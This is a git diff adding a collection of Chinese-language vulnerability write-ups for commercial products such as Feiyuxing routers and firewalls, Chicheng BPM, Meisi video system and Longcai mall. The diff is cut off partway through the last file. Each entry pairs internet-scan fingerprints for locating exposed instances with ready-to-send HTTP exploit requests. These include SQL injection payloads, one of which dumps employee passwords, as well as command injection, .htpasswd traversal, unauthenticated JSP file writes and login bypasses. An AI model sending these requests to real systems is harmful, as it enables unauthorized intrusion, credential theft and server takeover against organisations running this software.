diff --git a/飞讯云供应链平台MyImportData前台SQL注入.md b/飞讯云供应链平台MyImportData前台SQL注入.md
new file mode 100644
index 0000000..decc202
--- /dev/null
+++ b/飞讯云供应链平台MyImportData前台SQL注入.md
@@ -0,0 +1,38 @@
+# 飞讯云供应链平台MyImportData 前台SQL注入
+
+# ke一、漏洞简介
+WMS系统是借助条码、移动设备、互联网等技术实现仓库收、发、存等作业流程的自动化、和数字化的信息管理系统，旨在帮助客户解决库存分类管理和实时监控、仓库延迟录入和账务不符、仓储作业效率和作业合规、物料批次管理和库存库龄预警等问题，实现降低内部存货风险，提高企业的资金流转，促进产、销、供与财务端间的有效协同和提升仓库库容率和仓储运作效率的目标。 飞讯云WMS系统存在SQL注入，成功利用该漏洞可获取敏感信息，造成远程代码执行。
+
+# 二、影响版本
++ 飞讯云WMS
+
+# 三、资产测绘
++ fofa`icon_hash="-2088130336"``body="wx8ccb75857bd3e985"`
++ 特征
+
+![1721892431875-70ae1713-fa25-4875-b9f0-de4a891b31f2.png](./img/ZJLY5lae1UPP7ur9/1721892431875-70ae1713-fa25-4875-b9f0-de4a891b31f2-603050.png)
+
+# 四、漏洞复现
+```plain
+GET /MyDown/MyImportData?opeid=%27+WAITFOR+DELAY+%270%3A0%3A5%27-- HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate, br, zstd
+Connection: keep-alive
+Cookie: JSESSIONID=83a23f73-2908-4424-abd9-6b044cdfe003; Language=zh-CN
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: none
+Sec-Fetch-User: ?1
+Priority: u=0, i
+```
+
+![1721892461788-574ec73d-01c4-4aea-b83a-ca51a265c5a1.png](./img/ZJLY5lae1UPP7ur9/1721892461788-574ec73d-01c4-4aea-b83a-ca51a265c5a1-340837.png)
+
+
+
+> 更新: 2024-08-12 17:15:59  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/rldp6r4s4n2hly4z>
\ No newline at end of file
diff --git a/飞鱼星-路由器存在敏感信息泄露漏洞.md b/飞鱼星-路由器存在敏感信息泄露漏洞.md
new file mode 100644
index 0000000..c3624fe
--- /dev/null
+++ b/飞鱼星-路由器存在敏感信息泄露漏洞.md
@@ -0,0 +1,21 @@
+# 飞鱼星-路由器存在敏感信息泄露漏洞
+成都飞鱼星科技股份有限公司成立于2002年，公司现有全场景（行业）无线网络解决方案、公安审计解决方案、星云平台、企业级无线路由器、企业上网行为管理路由、智能家居解决方案、全屋Wi-Fi覆盖方案、安防监控交换机等产品及方案，致力于提供智能易用的网络通讯产品与服务，通过创新技术不断提升网络使用质量，为用户创建智能、高效、人性化的网络管理平台。飞鱼星-路由器存在敏感信息泄露漏洞
+
+## fofa
+```javascript
+body="js/select2css.js"
+```
+
+## poc
+```javascript
+GET /js/../.htpasswd HTTP/1.1
+Host: 
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+```
+
+![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1734321644321-511c2e49-d340-4575-a1cb-8fc98e0aa304.png)
+
diff --git a/飞鱼星下一代防火墙安全网关aaa_portal_auth_wchat_submit存在远程命令执行漏洞.md b/飞鱼星下一代防火墙安全网关aaa_portal_auth_wchat_submit存在远程命令执行漏洞.md
new file mode 100644
index 0000000..7f3f1f8
--- /dev/null
+++ b/飞鱼星下一代防火墙安全网关aaa_portal_auth_wchat_submit存在远程命令执行漏洞.md
@@ -0,0 +1,41 @@
+# 飞鱼星下一代防火墙安全网关aaa_portal_auth_wchat_submit存在远程命令执行漏洞
+
+# 一、漏洞简介
+飞鱼星下一代防火墙安全网关aaa_portal_auth_wchat_submit存在远程命令执行漏洞，攻击者可通过该漏洞获取服务器权限。
+
+# 二、影响版本
++ 飞鱼星下一代防火墙安全网关
+
+# 三、资产测绘
++ hunter`web.title="下一代防火墙安全网关"&&web.body="./webui/js/jquerylib/"`
++ 特征
+
+![1703406555367-82625773-f5ee-47db-a94e-a974cf2112bf.png](./img/3hKIFGXdPlbXJRDM/1703406555367-82625773-f5ee-47db-a94e-a974cf2112bf-028450.png)
+
+# 四、漏洞复现
+```plain
+GET /webui/?g=aaa_portal_auth_wchat_submit&suffix=;echo%20%60whoami%60%20|tee%20/usr/local/webui/sslvpn/stc.txt|ls HTTP/1.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
+Host: {hostname}
+Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
+Connection: close
+```
+
+![1703406610179-b013056a-1211-4fb4-83ba-6718a16f1150.png](./img/3hKIFGXdPlbXJRDM/1703406610179-b013056a-1211-4fb4-83ba-6718a16f1150-394370.png)
+
+获取命令执行结果
+
+```plain
+GET /sslvpn/stc.txt HTTP/1.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
+Host: {hostname}
+Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
+Connection: close
+```
+
+![1703406632394-be847ae6-b195-4974-bd17-5b3ccbe76f2c.png](./img/3hKIFGXdPlbXJRDM/1703406632394-be847ae6-b195-4974-bd17-5b3ccbe76f2c-297158.png)
+
+
+
+> 更新: 2024-09-03 14:56:23  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/qc40w8qnkoefmbpx>
\ No newline at end of file
diff --git a/飞鱼星家用智能路由存在敏感信息泄露漏洞.md b/飞鱼星家用智能路由存在敏感信息泄露漏洞.md
new file mode 100644
index 0000000..82b7ca1
--- /dev/null
+++ b/飞鱼星家用智能路由存在敏感信息泄露漏洞.md
@@ -0,0 +1,31 @@
+# 飞鱼星家用智能路由存在敏感信息泄露漏洞
+
+# 一、漏洞详情
+飞鱼星家用智能路由存在敏感信息泄露漏洞
+
+# 二、影响版本
++ 飞鱼星家用智能路由
+
+# 三、资产测绘
++ fofa`title="飞鱼星家用智能路由"`
++ <font style="color:rgb(51, 51, 51);">特征</font>
+
+![1710903993282-74c0565e-7ea8-4511-909f-4be0e632c2a7.png](./img/Ak2FNPPxjNY5naA1/1710903993282-74c0565e-7ea8-4511-909f-4be0e632c2a7-503451.png)
+
+# 四、漏洞复现
+```http
+GET /request_para.cgi?parameter=wifi_info HTTP/1.1
+Host: 
+X-Requested-With: XMLHttpRequest
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
+Accept: application/json, text/javascript, */*; q=0.01
+```
+
+![1719500556398-d9e3207a-fdb4-4fbb-8e58-ad526533c975.png](./img/Ak2FNPPxjNY5naA1/1719500556398-d9e3207a-fdb4-4fbb-8e58-ad526533c975-527172.png)
+
+
+
+> 更新: 2024-09-03 14:56:23  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/xagia0vo5d52b945>
\ No newline at end of file
diff --git a/飞鱼星家用智能路由存在权限绕过漏洞.md b/飞鱼星家用智能路由存在权限绕过漏洞.md
new file mode 100644
index 0000000..e173568
--- /dev/null
+++ b/飞鱼星家用智能路由存在权限绕过漏洞.md
@@ -0,0 +1,26 @@
+# 飞鱼星家用智能路由存在权限绕过漏洞
+
+# 一、漏洞详情
+飞鱼星家用智能路由存在权限绕过漏洞
+
+# 二、影响版本
++ 飞鱼星家用智能路由
+
+# 三、资产测绘
++ fofa`title="飞鱼星家用智能路由"`
+
+![1719500481297-cc6eb011-dc89-4927-9a7d-f1cda4f19459.png](./img/Y8HpEzdRmOBnMfKt/1719500481297-cc6eb011-dc89-4927-9a7d-f1cda4f19459-130632.png)
+
+# 四、漏洞复现
+```plain
+/index.html
+```
+
+看见/cookie.cgi时，丢弃即可进入后台
+
+![1719498557012-c056c25e-abfa-4699-a939-ee754e115eb8.jpeg](./img/Y8HpEzdRmOBnMfKt/1719498557012-c056c25e-abfa-4699-a939-ee754e115eb8-380445.jpeg)![1719500276585-2ee27808-7c21-41af-91fd-53a76c11fb15.png](./img/Y8HpEzdRmOBnMfKt/1719500276585-2ee27808-7c21-41af-91fd-53a76c11fb15-759001.png)
+
+
+
+> 更新: 2024-09-03 14:56:23  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/uuo3rmxg1tggqqrb>
\ No newline at end of file
diff --git a/飞鱼星智能上网行为管理系统send_order存在远程命令执行漏洞.md b/飞鱼星智能上网行为管理系统send_order存在远程命令执行漏洞.md
new file mode 100644
index 0000000..c298ae7
--- /dev/null
+++ b/飞鱼星智能上网行为管理系统send_order存在远程命令执行漏洞.md
@@ -0,0 +1,36 @@
+# 飞鱼星智能上网行为管理系统send_order存在远程命令执行漏洞
+
+# 一、漏洞详情
+飞鱼星智能上网行为管理系统send_order存在远程命令执行漏洞，攻击者可通过该漏洞获取服务器权限。
+
+# 二、影响版本
++ 飞鱼星智能上网行为管理系统
+
+# 三、资产测绘
++ fofa`<font style="color:rgb(51, 51, 51);">title="飞鱼星企业级智能上网行为管理系统"</font>`
++ <font style="color:rgb(51, 51, 51);">特征</font>
+
+![1710903993282-74c0565e-7ea8-4511-909f-4be0e632c2a7.png](./img/SzODbDuHutGaSVyR/1710903993282-74c0565e-7ea8-4511-909f-4be0e632c2a7-151278.png)
+
+# 四、漏洞复现
+```plain
+POST /send_order.cgi?parameter=operation HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+Upgrade-Insecure-Requests: 1
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 62
+
+{"opid":"777777777777777777","name":";id;echo;","type":"rest"}
+```
+
+![1710904029519-91bc1ada-e0fd-41c8-842a-20a097fc13ab.png](./img/SzODbDuHutGaSVyR/1710904029519-91bc1ada-e0fd-41c8-842a-20a097fc13ab-193394.png)
+
+
+
+> 更新: 2024-09-03 14:56:23  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ewvgyd0pqty4snsb>
\ No newline at end of file
diff --git a/飞鱼星智能上网行为管理系统存在敏感信息泄露漏洞.md b/飞鱼星智能上网行为管理系统存在敏感信息泄露漏洞.md
new file mode 100644
index 0000000..15bc16c
--- /dev/null
+++ b/飞鱼星智能上网行为管理系统存在敏感信息泄露漏洞.md
@@ -0,0 +1,37 @@
+# 飞鱼星智能上网行为管理系统存在敏感信息泄露漏洞
+
+# 一、漏洞详情
+飞鱼星智能上网行为管理系统存在敏感信息泄露漏洞
+
+# 二、影响版本
++ 飞鱼星智能上网行为管理系统
+
+# 三、资产测绘
++ fofa`<font style="color:rgb(51, 51, 51);">title="飞鱼星企业级智能上网行为管理系统"</font>`
++ <font style="color:rgb(51, 51, 51);">特征</font>
+
+![1710903993282-74c0565e-7ea8-4511-909f-4be0e632c2a7.png](./img/9AG4ORDV7IedqzFz/1710903993282-74c0565e-7ea8-4511-909f-4be0e632c2a7-769660.png)
+
+# 四、漏洞复现
+```plain
+/request_para.cgi?parameter=wifi_info
+```
+
+![1719499181319-44ab815f-87e4-4cb2-b72d-0148d1a1af29.png](./img/9AG4ORDV7IedqzFz/1719499181319-44ab815f-87e4-4cb2-b72d-0148d1a1af29-508727.png)
+
+```plain
+/request_para.cgi?parameter=wifi_get_5g_host
+```
+
+![1719499500867-37ec082b-126b-4b69-a318-1bce91a416df.png](./img/9AG4ORDV7IedqzFz/1719499500867-37ec082b-126b-4b69-a318-1bce91a416df-114550.png)
+
+```plain
+/request_para.cgi?parameter=wifi_get_2g_host
+```
+
+![1719499611173-9f2abb60-be50-4582-ba17-dab541a20841.png](./img/9AG4ORDV7IedqzFz/1719499611173-9f2abb60-be50-4582-ba17-dab541a20841-304644.png)
+
+
+
+> 更新: 2024-09-03 14:56:23  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/qqt2qnbf01gqw3g6>
\ No newline at end of file
diff --git a/飞鱼星智能上网行为管理系统存在权限绕过漏洞.md b/飞鱼星智能上网行为管理系统存在权限绕过漏洞.md
new file mode 100644
index 0000000..f949dc6
--- /dev/null
+++ b/飞鱼星智能上网行为管理系统存在权限绕过漏洞.md
@@ -0,0 +1,29 @@
+# 飞鱼星智能上网行为管理系统存在权限绕过漏洞
+
+# 一、漏洞详情
+飞鱼星智能上网行为管理系统存在权限绕过漏洞
+
+# 二、影响版本
++ 飞鱼星智能上网行为管理系统
+
+# 三、资产测绘
++ fofa`<font style="color:rgb(51, 51, 51);">title="飞鱼星企业级智能上网行为管理系统"</font>`
++ <font style="color:rgb(51, 51, 51);">特征</font>
+
+![1710903993282-74c0565e-7ea8-4511-909f-4be0e632c2a7.png](./img/Td-ceWJhfx7Y6drZ/1710903993282-74c0565e-7ea8-4511-909f-4be0e632c2a7-927499.png)
+
+# 四、漏洞复现
+```plain
+/home/index.html
+```
+
+看见/cookie.cgi时，丢弃即可进入后台
+
+![1719498557012-c056c25e-abfa-4699-a939-ee754e115eb8.jpeg](./img/Td-ceWJhfx7Y6drZ/1719498557012-c056c25e-abfa-4699-a939-ee754e115eb8-695055.jpeg)
+
+![1719498461827-6823975c-d37a-4730-92a6-2daa19add176.png](./img/Td-ceWJhfx7Y6drZ/1719498461827-6823975c-d37a-4730-92a6-2daa19add176-664040.png)
+
+
+
+> 更新: 2024-09-03 14:56:23  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/lnnzlk47niwbf02n>
\ No newline at end of file
diff --git a/驰骋BPMRunSQL_Init存在SQL注入漏洞.md b/驰骋BPMRunSQL_Init存在SQL注入漏洞.md
new file mode 100644
index 0000000..4430d42
--- /dev/null
+++ b/驰骋BPMRunSQL_Init存在SQL注入漏洞.md
@@ -0,0 +1,42 @@
+# 驰骋BPM RunSQL_Init存在SQL注入漏洞
+
+# 一、漏洞简介
+驰骋BPM是一款功能强大的业务流程管理平台，可提供可视化的设计界面和灵活的流程配置，帮助企业轻松构建、管理和优化各类业务流程。驰骋BPM RunSQL_Init存在SQL注入漏洞，攻击者可通过该漏洞获取账号密码。
+
+# 二、影响版本
++ 驰骋BPM
+
+# 三、资产测绘
++ fofa`body="/WF/AppClassic/Home.htm"`
++ 特征
+
+![1723125316153-028df4e8-8d0c-4914-95e3-5fce485c6535.png](./img/xmBRbQspfgDUagT5/1723125316153-028df4e8-8d0c-4914-95e3-5fce485c6535-202430.png)
+
+# 四、漏洞复现
+```plain
+POST /WF/Comm/Handler.ashx?DoType=RunSQL_Init HTTP/1.1
+Accept: application/json, text/plain, */*
+Accept-Encoding: gzip, deflate
+Accept-Ldwk: bG91ZG9uZ3dlbmt1
+Accept-Language: zh-CN,zh;q=0.9
+Connection: keep-alive
+Content-Length: 160
+Content-Type: multipart/form-data; boundary=----123128312312389898yd98ays98d
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
+
+------123128312312389898yd98ays98d
+Content-Disposition: form-data; name="SQL"
+
+SELECT No,Pass FROM Port_Emp
+------123128312312389898yd98ays98d--
+```
+
+![1723125347422-b5c92bda-6742-4924-97dd-db99687877ee.png](./img/xmBRbQspfgDUagT5/1723125347422-b5c92bda-6742-4924-97dd-db99687877ee-419982.png)
+
+![1723125358177-e60f1d03-f1e7-44df-801d-aa9dfe0884e2.png](./img/xmBRbQspfgDUagT5/1723125358177-e60f1d03-f1e7-44df-801d-aa9dfe0884e2-311837.png)
+
+
+
+> 更新: 2024-08-12 17:15:57  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/lbie8f0kg63bbhee>
\ No newline at end of file
diff --git a/高校人力资源管理系统ReportServer存在敏感信息泄露漏洞.md b/高校人力资源管理系统ReportServer存在敏感信息泄露漏洞.md
new file mode 100644
index 0000000..1bab403
--- /dev/null
+++ b/高校人力资源管理系统ReportServer存在敏感信息泄露漏洞.md
@@ -0,0 +1,21 @@
+# 高校人力资源管理系统ReportServer存在敏感信息泄露漏洞
+高校人力资源管理系统ReportServer存在敏感信息泄露漏洞
+
+## fofa
+```javascript
+body="FM_SYS_ID" || body="product/recruit/website/RecruitIndex.jsp"
+```
+
+![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1729414884399-6be61b88-4e82-42e2-bfb0-451f6e130f92.png)
+
+## poc
+```java
+GET /ReportServer?op=Fr_server&cmd=Sc_getconnectioninfo HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
+Accept-Encoding: gzip, deflate
+Accept: */*
+```
+
+![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1729415182606-37ca16b7-4b31-40ae-b37a-7350c1af4d59.png)
+
diff --git a/魅思视频管理系统getOrderStatus存在SQL注入漏洞 2.md b/魅思视频管理系统getOrderStatus存在SQL注入漏洞 2.md
new file mode 100644
index 0000000..8fb67a3
--- /dev/null
+++ b/魅思视频管理系统getOrderStatus存在SQL注入漏洞 2.md	
@@ -0,0 +1,31 @@
+# 魅思视频管理系统getOrderStatus存在SQL注入漏洞
+
+# 一、漏洞简介
+<font style="color:rgb(47, 48, 52);">魅思·视频 管理系统是一款集成了视频管理、用户管理、手机端应用封装等功能的综合性视频管理系统。该系统不仅以其强大的视频!理功能、灵活的用户管理机制、便捷的手机端应用封装功能以及高安全性和现代化的界面设计，成为了市场上备受关注的视频管理系统。无论是对于专业的视频内容创作者还是对于需要视频管理功能的企业和个人用户来说，都是一个值得考虑的选择。魅思视频管理系统getOrderStatus存在SQL注入漏洞</font>
+
+# 二、影响版本
++ 魅思视频管理系统
+
+# 三、资产测绘
++ fofa`app="魅思-视频管理系统"`
++ 特征
+
+![1727023836767-354a75c7-a2c7-4473-b02d-e8a3390fcdf9.png](./img/oXIjlwtiyJrE2gt3/1727023836767-354a75c7-a2c7-4473-b02d-e8a3390fcdf9-203027.png)
+
+# 四、漏洞复现
+```go
+POST /api/getOrderStatus HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
+Content-Type: application/x-www-form-urlencoded
+Connection: close
+ 
+orderSn=') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(IFNULL(CAST(VERSION() AS NCHAR),0x20)),NULL,NULL,NULL,NULL,NULL-- -
+```
+
+![1727023853414-f66b3415-82fb-4dca-bfa6-1ae7f052f70a.png](./img/oXIjlwtiyJrE2gt3/1727023853414-f66b3415-82fb-4dca-bfa6-1ae7f052f70a-579791.png)
+
+
+
+> 更新: 2024-10-22 09:36:10  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/kv3dxee1t0tqrohb>
\ No newline at end of file
diff --git a/魅思视频管理系统getOrderStatus存在SQL注入漏洞.md b/魅思视频管理系统getOrderStatus存在SQL注入漏洞.md
new file mode 100644
index 0000000..f508750
--- /dev/null
+++ b/魅思视频管理系统getOrderStatus存在SQL注入漏洞.md
@@ -0,0 +1,21 @@
+# 魅思视频管理系统getOrderStatus存在SQL注入漏洞
+
+魅思视频管理系统getOrderStatus存在SQL注入漏洞，允许攻击者通过恶意构造的SQL语句操控数据库，从而导致数据泄露、篡改或破坏，严重威胁系统安全。
+
+## fofa
+
+```javascript
+app="魅思-视频管理系统"
+```
+
+## poc
+
+```javascript
+POST /api/getOrderStatus HTTP/1.1
+Content-Type: application/x-www-form-urlencoded
+user-agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
+
+orderSn=%27%29+UNION+ALL+SELECT+NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CCONCAT%28IFNULL%28CAST%28database%28%29+AS+NCHAR%29%2C0x20%29%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--+-
+```
+
+![image-20240917160329467](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409171603549.png)
\ No newline at end of file
diff --git a/魔方网表mailupdate接口存在任意文件上传漏洞.md b/魔方网表mailupdate接口存在任意文件上传漏洞.md
new file mode 100644
index 0000000..554f4cf
--- /dev/null
+++ b/魔方网表mailupdate接口存在任意文件上传漏洞.md
@@ -0,0 +1,43 @@
+# 魔方网表mailupdate接口存在任意文件上传漏洞
+
+# 一、漏洞简介
+魔方网表是一款基于web浏览器的通用信息管理软件，魔方网表ERP 存在任意文件上传漏洞，未经身份验证的攻击者可以利用此漏洞上传恶意后门文件 ，控制服务器权限
+
+# 二、影响版本
++ 魔方网表
+
+# 三、资产测绘
++ fofa`<font style="color:rgb(63, 63, 63);">icon_hash="694014318"</font>`
++ <font style="color:rgb(63, 63, 63);">特征</font>
+
+![1713198631042-1ecb3376-f689-4f92-a0fc-8722c6de5d26.png](./img/fcGeBck8qqEaERf7/1713198631042-1ecb3376-f689-4f92-a0fc-8722c6de5d26-935968.png)
+
+# 四、漏洞复现
+```java
+GET /magicflu/html/mail/mailupdate.jsp?messageid=/../../../test1.jsp&messagecontent=%3C%25+out.println%28%22tteesstt1%22%29%3B%25%3E HTTP/1.1
+User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
+Accept-Encoding: gzip, deflate
+Accept: */*
+Connection: close
+Host: 
+```
+
+![1713198660976-8be544e1-30c0-4c5d-82c6-ce893cd8d981.png](./img/fcGeBck8qqEaERf7/1713198660976-8be544e1-30c0-4c5d-82c6-ce893cd8d981-189341.png)
+
+文件上传位置
+
+```java
+GET /magicflu/test1.jsp HTTP/1.1
+User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
+Accept-Encoding: gzip, deflate
+Accept: */*
+Connection: close
+Host: 
+```
+
+![1713198689517-129760d5-4911-439f-9c06-03e28e38c489.png](./img/fcGeBck8qqEaERf7/1713198689517-129760d5-4911-439f-9c06-03e28e38c489-361593.png)
+
+
+
+> 更新: 2024-04-17 14:59:07  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/lb3k53eifkairogb>
\ No newline at end of file
diff --git a/鸿宇多用户商城scan_list.php存在SQL注入漏洞.md b/鸿宇多用户商城scan_list.php存在SQL注入漏洞.md
new file mode 100644
index 0000000..54ba587
--- /dev/null
+++ b/鸿宇多用户商城scan_list.php存在SQL注入漏洞.md
@@ -0,0 +1,23 @@
+# 鸿宇多用户商城scan_list.php存在SQL注入漏洞
+
+鸿宇多用户商城 scan_list.php 接口处存在SQL注入漏洞，未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息（例如，管理员后台密码、站点的用户个人信息）之外，甚至在高权限的情况可向服务器中写入木马，进一步获取服务器系统权限。
+
+## Fofa
+
+```javascript
+body="HongYuJD" && body="68ecshopcom_360buy"
+```
+
+## poc
+
+```javascript
+POST /scan_list.php HTTP/1.1
+Host: your-ip
+User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
+Content-Type: application/x-www-form-urlencoded
+Connection: close
+ 
+data['fahuo']=(SELECT 2753 FROM (SELECT(SLEEP(4)))QkUH)&act=view
+```
+
+![image-20241025141431703](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410251414765.png)
\ No newline at end of file
diff --git a/龙采商城系统后台_goods_getcate存在SQL注入.md b/龙采商城系统后台_goods_getcate存在SQL注入.md
new file mode 100644
index 0000000..26554fe
--- /dev/null
+++ b/龙采商城系统后台_goods_getcate存在SQL注入.md
@@ -0,0 +1,36 @@
+# 龙采商城系统后台/goods/getcate存在SQL注入
+
+### 一、漏洞描述
+龙采科技集团有限责任公司龙采商城系统后台/goods/getCate接口存在未授权SQL注入，可直接暴露出数据库敏感信息。
+
+### 二、影响版本
+龙采商城系统
+
+### 三、资产测绘
+FOFA：body="'url':'/pc2.0/index/index'"
+
+![1715916044415-70ff5169-8fd9-48e0-8c05-91ac458ccde4.png](./img/GOhx3tRoZc_7z5pI/1715916044415-70ff5169-8fd9-48e0-8c05-91ac458ccde4-841370.png)
+
+### 四、漏洞复现
+```plain
+POST /goods/getCate HTTP/2
+Host: xxx
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 65
+
+id=1%20and%20updatexml(1,concat(0x7e,database(),0x7e),1)&keyword=
+```
+
+使用burp请求POC即可暴出敏感数据库（也可以采用sqlmap跑出大量敏感信息）
+
+![1715916319450-8e51a0ec-7878-4d2d-a04f-c7cc9af69340.png](./img/GOhx3tRoZc_7z5pI/1715916319450-8e51a0ec-7878-4d2d-a04f-c7cc9af69340-172677.png)
+
+
+
+> 更新: 2024-06-01 11:14:23  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/dyk2it32v9mtbdqw>
\ No newline at end of file
diff --git a/龙采商城系统存在未授权修改文章title.md b/龙采商城系统存在未授权修改文章title.md
new file mode 100644
index 0000000..635d776
--- /dev/null
+++ b/龙采商城系统存在未授权修改文章title.md
@@ -0,0 +1,40 @@
+# 龙采商城系统存在未授权修改文章title
+
+### 一、漏洞描述
+龙采科技集团有限责任公司龙采商城系统后台未授权修改文章title，可直接无需登录后台后即可修改文章title。
+
+### 二、影响版本
+龙采商城系统
+
+### 三、资产测绘
+FOFA：body="'url':'/pc2.0/index/index'"
+
+### 四、漏洞复现
+<font style="color:black;background-color:#FFFFFF;">来到帮助中心，随机找一个分类标题，F12查看其article_id记录下来，替换掉POC里的id值，请求POC，更改data内容（建议以原来title内容+1作为区分，攻击后记得改回来），刷新页面发现标题已经被更改！</font>![1715916930434-01af42c1-1705-4129-bce4-57431e8393ec.png](./img/pw7d7qCzBp2HBEtJ/1715916930434-01af42c1-1705-4129-bce4-57431e8393ec-209105.png)
+
+```plain
+POST /article/text_update HTTP/2
+Host: xxx
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 39
+
+id=77&parameter=title&data=常见问题1
+```
+
+![1715917138219-9cb3910f-288b-4aa9-b705-aea33fb47217.png](./img/pw7d7qCzBp2HBEtJ/1715917138219-9cb3910f-288b-4aa9-b705-aea33fb47217-081146.png)
+
+刷新以后发现已将"购物流程"修改为"常见问题1"
+
+![1715917093672-79d7e39f-f182-4866-a2ef-8dab2a76b49d.png](./img/pw7d7qCzBp2HBEtJ/1715917093672-79d7e39f-f182-4866-a2ef-8dab2a76b49d-426834.png)
+
+<font style="color:black;background-color:#f0f2f5;"></font>
+
+
+
+> 更新: 2024-06-01 11:14:22  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/lvt3fs0uh5qmnvyc>
\ No newline at end of file
diff --git a/龙采商城系统存在未授权添加会员登录.md b/龙采商城系统存在未授权添加会员登录.md
new file mode 100644
index 0000000..edbbde0
--- /dev/null
+++ b/龙采商城系统存在未授权添加会员登录.md
@@ -0,0 +1,38 @@
+# 龙采商城系统存在未授权添加会员登录
+
+### 一、漏洞描述
+龙采科技集团有限责任公司龙采商城系统存在未授权漏洞可在未登录后台的情况下请求POC添加会员并登录。
+
+### 二、影响版本
+龙采商城系统
+
+### 三、资产测绘
+FOFA：body="'url':'/pc2.0/index/index'"
+
+### 四、漏洞复现
+攻击前无法登录会员（15712341234/123456ys），请求POC攻击后即可正常登录会员。
+
+![1715915610877-c3de95a7-b27b-48db-abeb-35981520445c.jpeg](./img/ye2mTZUMWNMKHS1X/1715915610877-c3de95a7-b27b-48db-abeb-35981520445c-974942.jpeg)构造POC进行发送
+
+```plain
+POST /member/create HTTP/2
+Host: xxxx
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
